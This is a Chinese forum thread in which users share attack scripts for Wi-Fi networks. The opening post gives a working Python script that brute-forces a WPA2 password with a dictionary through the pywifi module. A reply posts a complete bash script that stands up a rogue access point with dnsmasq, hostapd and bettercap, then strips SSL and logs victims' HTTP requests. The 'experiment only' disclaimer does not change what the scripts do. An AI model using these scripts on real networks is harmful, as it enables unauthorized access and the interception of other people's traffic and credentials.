QingYi. 发表于 2021-6-1 16:46

使用密码字典 和 Python自带的pywifi模块去暴力**wifi

没啥好说的,一切都在代码中
import pywifi
import time

from pywifi import const

def wifi_connnect(pwd):
    wifi = pywifi.PyWiFi()
    #拿到第一个
    inter = wifi.interfaces()
    #先断开连接!!!!不断就没得搞手,先断开,才可以连接其他的WIFI
    inter.disconnect()
    #休眠3秒
    time.sleep(3)
    #如果是没连接的状态下
    if inter.status() == const.IFACE_DISCONNECTED:
      #注意是大写Pro
      f = pywifi.Profile()
      #设置好想要蹂躏的id
      f.ssid = "bdj"
      #密码用字典
      f.key = pwd
      #网卡的开放
      f.auth = const.AUTH_ALG_OPEN
      #加密单元
      f.cipher = const.CIPHER_TYPE_CCMP
      #加密算法的类型
      f.akm.append(const.AKM_TYPE_WPA2PSK)
      #删除之前的wifi文件
      inter.remove_all_network_profiles()
      #设置新的连接文件
      temp_p = inter.add_network_profile(f)
      #去连接它
      inter.connect(temp_p)
      time.sleep(3)
      #连接成功直接return
      if inter.status() == const.IFACE_CONNECTED:
            return True
      else:
            return False

    else:
      print("connected")

def readtxt():
    #这里填自己字典的绝对路径
    path = "D:\填绝对路径"
    #打开文件,设置为read模式
    file = open(path, "r")
    #死循环
    while True:
      #pwd 为读取到的每一行
      pwd = file.readline()
      # print(pwd)
      #如果连接上了,wifi_connect会return True 那么直接break吊while循环
      res = wifi_connnect(pwd)
      if res:
            print("password is correct", pwd)
            break
      else:
            print("password is error", pwd)

#调用函数
readtxt()
在新标签打开所有链接复制所有链接URL复制所有链接URL(反向)复制所有链接标题 + URL复制所有链接标题 + URL (MD)复制所有链接标题 + URL (BBS)复制所有链接标题 + URL (筛选)复制所有链接标题 + URL (设置复制格式)在新标签页打开所有图片链接在一个标签页显示所有图片链接
复选框 - 选中
复选框 - 取消
复选框 - 反选
单选框 - 选中
单选框 - 取消
特殊单选框 - 选中

mdf3192078 发表于 2021-6-3 19:24

本帖最后由 mdf3192078 于 2021-6-3 19:27 编辑

#!/bin/bash
# Description: This script function is one click to create a Evil-AP and MITM it.
# Version: v0.1

echo PLEASE USE sudo apt-get install dnsmasq hostapd bettercap

MONITOR_DEVICE=wlan0
OUTPUT_DEVICE=eth0

cat <<EOF > dnsmasq.conf
log-facility=/var/log/dnsmasq.log
dhcp-range=192.168.5.1,192.168.5.250,12h
dhcp-option=3,192.168.5.1
dhcp-option=6,192.168.5.1
server=114.114.114.114
log-queries
log-dhcp
EOF

cat <<EOF > hostapd.conf
driver=nl80211
ssid=test
hw_mode=g
channel=6
logger_syslog=-1
logger_syslog_level=2
EOF

cat <<EOF > net-sniffer.cap
set gateway.address 192.168.5.1
net.probe on
set http.proxy.sslstrip true
set https.proxy.sslstrip true
set http.proxy.script http-req-dump.js
set https.proxy.script http-req-dump.js
net.sniff on
http.proxy on
https.proxy on
EOF

# Catch ctrl c so we can exit cleanly
trap ctrl_c INT
function ctrl_c(){
    echo Killing processes...
    killall dnsmasq
    killall hostapd
}

ifconfig $MONITOR_DEVICE 192.168.5.1/24 up
dnsmasq -C dnsmasq.conf -i $MONITOR_DEVICE
sysctl -w net.ipv4.ip_forward=1
iptables -P FORWARD ACCEPT
iptables --table nat -A POSTROUTING -o $OUTPUT_DEVICE -j MASQUERADE
hostapd ./hostapd.conf -i $MONITOR_DEVICE -B
cp /usr/share/bettercap/caplets/http-req-dump/http-req-dump.js .
bettercap -iface $MONITOR_DEVICE -caplet net-sniffer.cap
echo Killing processes...
killall dnsmasq hostapd
rm -rf hostapd.conf dnsmasq.conf http-req-dump.js net-sniffer.cap


给一份钓鱼wifi脚本,大家可以试试。这个脚本只能是实验,不能实战!目前在kali linux 2020.3及以上版本测试无问题。
总之证书双向认证是过不了的。https窃听有很大的提示,所以只能实验实验。

mdf3192078 发表于 2021-6-1 18:13

本帖最后由 mdf3192078 于 2021-6-1 18:14 编辑

三个问题
1,速度特别慢!这个是肯定的的,不如抓包后跑包来的快,但对于无连接的wifi只能这样子跑了。
2,对于隐藏的SSID无法进行正确破解,即使密码正确也会报password is error
3,密码字典如果是手工输入的,最后一行没有标识符的话会一直读取空行。
密码字典的绝对路径最好有双斜杠\\以免产生歧义

小懒虫丶 发表于 2021-6-1 17:18

感谢分享

Laney 发表于 2021-6-1 17:37

学习学习

fdy8421 发表于 2021-6-1 17:46

路过,学习啦!点赞!

fanvalen 发表于 2021-6-1 17:52

嘟WiFi已关闭

sqzh 发表于 2021-6-1 19:02

确实看不懂,研究了半天

60235300 发表于 2021-6-1 19:55

手说:我会了。眼睛:不会{:1_925:}

nanaqilin 发表于 2021-6-1 19:58

厉害了,以前都是在linux抓包跑字典才行的

QingYi. 发表于 2021-6-1 19:58

mdf3192078 发表于 2021-6-1 18:13
三个问题
1,速度特别慢!这个是肯定的的,不如抓包后跑包来的快,但对于无连接的wifi只能这样子跑了。
2 ...

收到,学习到了。
页: [1] 2 3
查看完整版本: 使用密码字典 和 Python自带的pywifi模块去暴力**wifi